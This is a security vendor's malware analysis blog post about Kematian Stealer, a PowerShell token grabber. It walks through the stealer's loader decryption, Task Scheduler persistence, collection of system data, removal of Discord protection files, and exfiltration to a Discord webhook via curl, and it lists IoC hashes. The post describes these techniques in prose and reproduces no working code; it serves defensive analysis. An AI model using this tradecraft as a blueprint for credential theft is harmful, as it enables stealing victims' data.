Kematian Stealer forked from PowerShell Token Grabber

Kematian Stealer forked from PowerShell Token Grabber - K7 Labs Kematian Stealer forked from PowerShell Token Grabber Posted by K7 Labs July 2, 2024 September 3, 2024 PowerShell Stealer Trojan Kematian Stealer forked from PowerShell Token Grabber By K7 Labs July 2, 2024 No Comments --> Stealers are a widespread threat providing threat actors with access to a wealth of sensitive data which is then exfiltrated to them for further abuse. Kematian Stealer, a PowerShell based tool is one such sophisticated malware. Recently we came across a tweet about Kematian Stealer. It was a PowerShell based Token-Grabber. Figure 1: Execution_Flow Binary Analysis Let’s now analyse the malware in depth. The binary is a 64-bit portable executable and a loader file. The loader written in C++ , contains an obfuscated script in its resource section. Figure 2: Resource-Blob The malware extracts the “112E9CAC33494A35D3547F4B3DCD2FD5” blob in the resource section, decrypts it, which is a batch file. Figure 3: Decryption_Loop The above loop is used to decrypt the blob that was mentioned earlier. It was likely RC4. Figure 4: Decrypted_Script After decrypting, it tries to run the bat file with elevated privileges. Figure 5: Bat_File (am_admin) The batch file containing the powershell_script is then executed. On execution, it checks if the script is running with admin privileges. If not, it prompts the user to run the script with elevated privilege. If the script gets an elevated privilege, only then it moves on to the next function. Figure 6: Check_If_Admin After that it runs the task function used for persistence. It creates persistence via the Windows Task Scheduler. First it creates a copy of the PowerShell script and places it in the %Appdata% folder with a filename percs.ps1. Figure 7: Task_Creation The script checks whether the directory, file, and task already exist before creating them. This prevents conflicts that would arise if multiple instances run simultaneously, potentially causing system instability or alerting the user of unusual behaviour. Then it moves on to the data collection function called Grub. Data collection The grub function contains the main stealer code that’s mainly focused on system configuration and network environment information. It begins with obtaining the system’s public IP by invoking the web request “Invoke-Web Request -Uri https://api.ipify.org ”, after obtaining the IP it stores it in a text file “ip.txt’ located in the users local application data directory “%LOCALAPPDATA%\Temp\ip.txt”. Figure 8: IP_Stealer It then collects system information using the Windows command-line. PowerShell executes the Systeminfo.exe which retrieves the system information like OS Version, Host Name, System Model and more. After getting all the information it redirects the information to a text file named “system_info.txt” and stores it in the user’s “%LOCALAPPDATA%\Temp\ System_info.txt” location. Figure 9: System_Info_stealer After collecting System info and System Public IP, it starts to collect System UUID and Mac addresses using WMI. It extracts the UUID and Mac address value from the WMI and stores it a text file named “uuid.txt” and “mac.txt” in the “%LOCALAPPDATA%\Temp\uuid.txt” and “%LOCALAPPDATA%\Temp\mac.txt” location. Figure 10: UUID_stealer Figure 11: MAC_Stealer After collecting the UUID and Mac address it collects the info about the system’s current username and hostname by using the system environment variable. Figure 12: User & Host At last it collects the system netstat information by using the Windows command-line. The PowerShell script executes NETSTAT.exe and retrieves the network statistics, like active connections, listening ports with the associated Process IDs. Figure 13: Netstat_Stealer After that the author constructs a detailed and formatted message to be sent to a Discord channel using a web hook. The script includes system information about the victim (IP, username, hostname, UUID, MAC address) formatted as fields and visual elements like colour, thumbnail, and footer to make the message more appealing and structured. With this it sends the POST request to the specified Web Hook url that is mentioned within the JSON payload. Figure 14: Discord_Structure Then it tries to terminate some Discord related process and also tries to remove some files if it exists, like Discord Token Protector etc. that could protect from malicious grabbers. To evade detection from security products, it checks the presence of Discord token protector.exe and secure.dat. If these files are present in the Discord token directory, the malware removes them. Figure 15: Discord_Kill After that it checks if the particular directory exists or not, if it is available, it proceeds further else it creates a new directory “LOCALAPPDATA\Temp\percs”. Figure 16: Downloading_Payload After creating a particular directory, it tries to download a payload called main.exe. But unfortunately it’s not available in that particular web page; it redirects to the Kematian stealer GitHub page instead. Figure 17: Url_Redirection At this stage of analysis, we understand that the stealer is a previous version of the Kematian stealer. Initially known as PowerShell-Token-Grabber; it was built by author KDot227 and now changed to Somali-Devs. In their recent updates they also mentioned about the author change in their source code and the GitHub page also redirects to the Kematian stealer GitHub page. We got the main.exe from Virus total which was a python based executable. While decompiling the python executable, we came to know that this is where the browser stealer code is present. It focuses mainly on browser cookies, passwords, history details and the desktop screenshot. Figure 18: Targeted_Browsers Figure 19: Desktop_Grabber It also targets Discord tokens; it tries to inject code into various discord clients to capture discord tokens, for that it tries to download JavaScript by the author KDot227 in the name of injection.js. Discord DiscordCanary DiscordPTB DiscordDevelopment Figure 20: Discord_Injection Data Exfiltration After collecting all the required data, it then moves all the collected data from the application data directory to the newly created directory “LOCALAPPDATA\Temp\percs\”. It also tries to search for browser cookies, passwords and get the desktop screengrab; it was unable to retrieve the same as the webpage was not available. At last it compresses all the text files and zip the particular data directory. Figure 21: Stolen_Data Curl.exe is used for transferring the data along with a Json payload which contains the name and content. Finally, the grabber exfiltrates all the data to the Discord channel using a web hook. Figure 22: Data_Compressing After exfiltrating all the data, it clears all the traces including directories and collected data. Figure 23: Deleting_Traces When we compare this token grabber with the new version of Kematian stealer, many new features like Builder, Evasion and more have been added. New Features GUI Builder AntiVirus Evasion Anti-Analysis/Extracts WiFi passwords Webcam & Desktop screenshot Session stealer (Messaging, Gaming, VPN clients, FTP client and more) As we can see, threat actors are updating their malware to become more evasive. Compared to other stealers, this mainly focused on network related information which could be used for active reconnaissance. As the information stolen by the malware is sensitive, protecting yourself by investing in a reputable security product such as K7 AntiVirus is therefore necessary in today’s world. We at K7 Labs provide detection for such kinds of stealers and all the latest threats. Users are advised to use a reliable security product such as “ K7 Total Security ” and keep it up-to-date to safeguard their devices. IoCs File name Hash Detection name Loader 02F3B7596CFF59B0A04FD2B0676BC395 Trojan-Downloader ( 005a4e961 ) 584A.bat D2EA85153D712CCE3EA2ABD1A593A028 Trojan-Downloader ( 005a4e921 ) PowerShell.ps1 A3619B0A3EE7B7138CEFB9F7E896F168 Trojan ( 0001140e1 ) Main.exe E06F672815B89458C03D297DB99E9F6B Trojan ( 005ae5411 ) Injection.js 1CBBFBC69BD8FA712B037EBE37E87709 Trojan ( 00597b5e1 ) Facebook 0 Twitter 0 Linkedin 0 X Like what you're reading? Subscribe to our top stories. If you want to subscribe to our monthly newsletter, please submit the form below. Email * : Categories Activators Cracks Keygens Advanced Persistent Threats Advisory Adware Android Anti-Analysis Techniques Artificial Intelliigence Backdoor Banking Malware Botnet Breaking Cloud malware Cobalt Strike Code Hosting Platform Credential Stealer Crypters Cryptocurrency Cryptolocker Cryptomining Dark Web Data Privacy Deceptive Apps Decryptor Downloaders Email Exploits Fake Applications Hacktivism Internet IoT Keylogger Linux Malware Logging mac malware Macro Malicious DLLs Malicious Links Malware as a Service (MaaS) Malware Crypters Obfuscation Techniques Open Source Packers Password Stealer Personally Speaking Phishing PowerShell Privilege Escalation Protocols Python Python Ransomware Ransomware-as-a-Service (RaaS) Remote Access Software Remote Access Trojan Remote Admin Remote Code Execution Attacks Scams Script-Based Malware Scripting Malware Security Security News Security Tips Smishing Social Networking Apps Spam Spear-phishing Spyware Stager Stealer Trojan Storage Service Abuse Tech Articles Torrents Uncategorized Viruses Vulnerability WhatsApp Worms Featured Posts GIBCRYPTO: The Destructive Ransomware with a Snake Keylogger Connection March 11, 2026 Fake Telegram Malware Campaign: Analysis of a Multi-Stage Loader Delivered via Typosquatted Websites March 17, 2026 Resoker: A Telegram Based Remote Access Trojan March 30, 2026 Recent Posts Resoker: A Telegram Based Remote Access Trojan Fake Telegram Malware Campaign: Analysis of a Multi-Stage Loader Delivered via Typosquatted Websites March 17, 2026 GIBCRYPTO: The Destructive Ransomware with a Snake Keylogger Connection March 11, 2026 Previous Post « SpyMax – An Android RAT targets Telegram Users Next Post Echoes of Braodo Tales from the Cyber Underworld » More Posts Uncategorized South Indian Ladies from Kerala Face Reserve Cyber Insecurity Samir Mody January 29, 2011 Malware as a Service (MaaS) Stealer Trojan RedLine Stealer – The MaaS Info Stealer K7 Labs December 1, 2021 Security News FBI issues scareware warning administrator December 15, 2009 0 replies on “Kematian Stealer forked from PowerShell Token Grabber”